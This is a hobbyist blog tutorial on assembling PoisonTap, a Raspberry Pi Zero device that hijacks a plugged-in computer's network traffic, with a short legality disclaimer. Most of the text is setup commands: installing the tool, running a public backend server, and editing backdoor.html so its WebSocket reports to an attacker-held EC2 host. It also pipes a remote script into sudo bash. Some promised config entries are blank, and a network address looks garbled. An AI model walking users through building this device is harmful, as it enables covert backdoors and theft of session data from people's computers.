Samy Kamkars Poison tap is probably one of the most exciting raspberry pi0 infosec focused projects out there at the moment. not only is poison tap a really powerful tool but its also relatively cheap to build (this whole project only cost me about $40).
As always disclaimer trying to run Poison tap on infrastructure that is not your own or that you don't have permission to access is most likely illegal, don't try this at home kids.
Lets launch into Poison tap!
What you will need
So for this project you will need the following items to build a working poisontap setup:
- A Raspberry pi zero.
- A publicly accessible web server.
- An SD card (to install raspbian on - it should be at least 16GB).
- A micro usb cable.
Building the image
Run the following linux / unix commands to install raspbian on your sd card
Last login: Sun Feb 19 15:16:09 on ttys001 MBP:~ secsleuth$ ls 2017-03-02-raspbian-jessie.img MBP:~ secsleuth$ sudo dd bs=1m if=2017-03-02-raspbian-jessie.img of=/dev/disk2 4190+0 records in 4190+0 records out 4393533440 bytes transferred in 1346.772204 secs (3262269 bytes/sec) MBP:~ secsleuth$
After creating the image we need to make a file called "ssh" and copy it to the root of the SD card so that the pi0 will be accessible over ssh.
Installing the Poison tap tools on your server
When running poisontap you will need a server for your pi0 to pipe data to, you can get your server up and running by running the following commands:
$ sudo apt-get install git npm $ sudo npm install websocket $ curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash - $ sudo apt-get install nodejs $ git clone https://github.com/samyk/poisontap $ cd poisontap $ sudo node backend_server.js & Sat Apr 01 2017 08:30:47 GMT+0000 (UTC) Server is listening on port 1337
Now your server is ready and listening for your poisontap. Please note that your server must be publicly accessible so for this server I am using an AWS hosted instance.
Configuring your poison tap
Like we just did for the webserver we must now ssh into our raspberry pi0 and complete the poisontap setup with the following commands:
$ sudo apt-get -y install isc-dhcp-server dsniff git $ curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash - $ sudo apt-get install nodejs $ git clone https://github.com/samyk/poisontap $ cd poisontap
now update the backdoor.html file to point to the webserver we setup earlier:
var socket = new WebSocket('ws://<amazon EC2 instance address>:1337');
Next we need to add the following to the bottom of the /etc/network/interfaces file
auto usb0 allow-hotplug usb0 iface usb0 inet static address 18.104.22.168 netmask 0.0.0.0
Now we need to update the pi0's DHCP config to work with poisontap so run the following command:
$ sudo cp -f dhcpd.conf /etc/dhcp/dhcpd.conf
We also need to add the following entry to the bottom of the /etc/default/isc-dhcp-server file:
Now we just need to make sure that poisontap runs on startup so to do this we need to run the following commands:
$ sudo cp /home/pi/poisontap/pi_startup.sh /etc/init.d/ $ sudo chmod +x /etc/init.d/pi_startup.sh
And we need to add the below to /etc/rc.local file just before it says exit 0
And thats it now your poisontap device is ready!
Now you are ready to go with your poisontap device! here is a look at my finished setup:
As always I hope you found this tutorial useful. Please let me know if you would like to see more tutorials on the raspberry pi0 or similar devices and thank you all for your support!
Also special thanks to Jerry Gamblin for his handy installation steps on GitHub.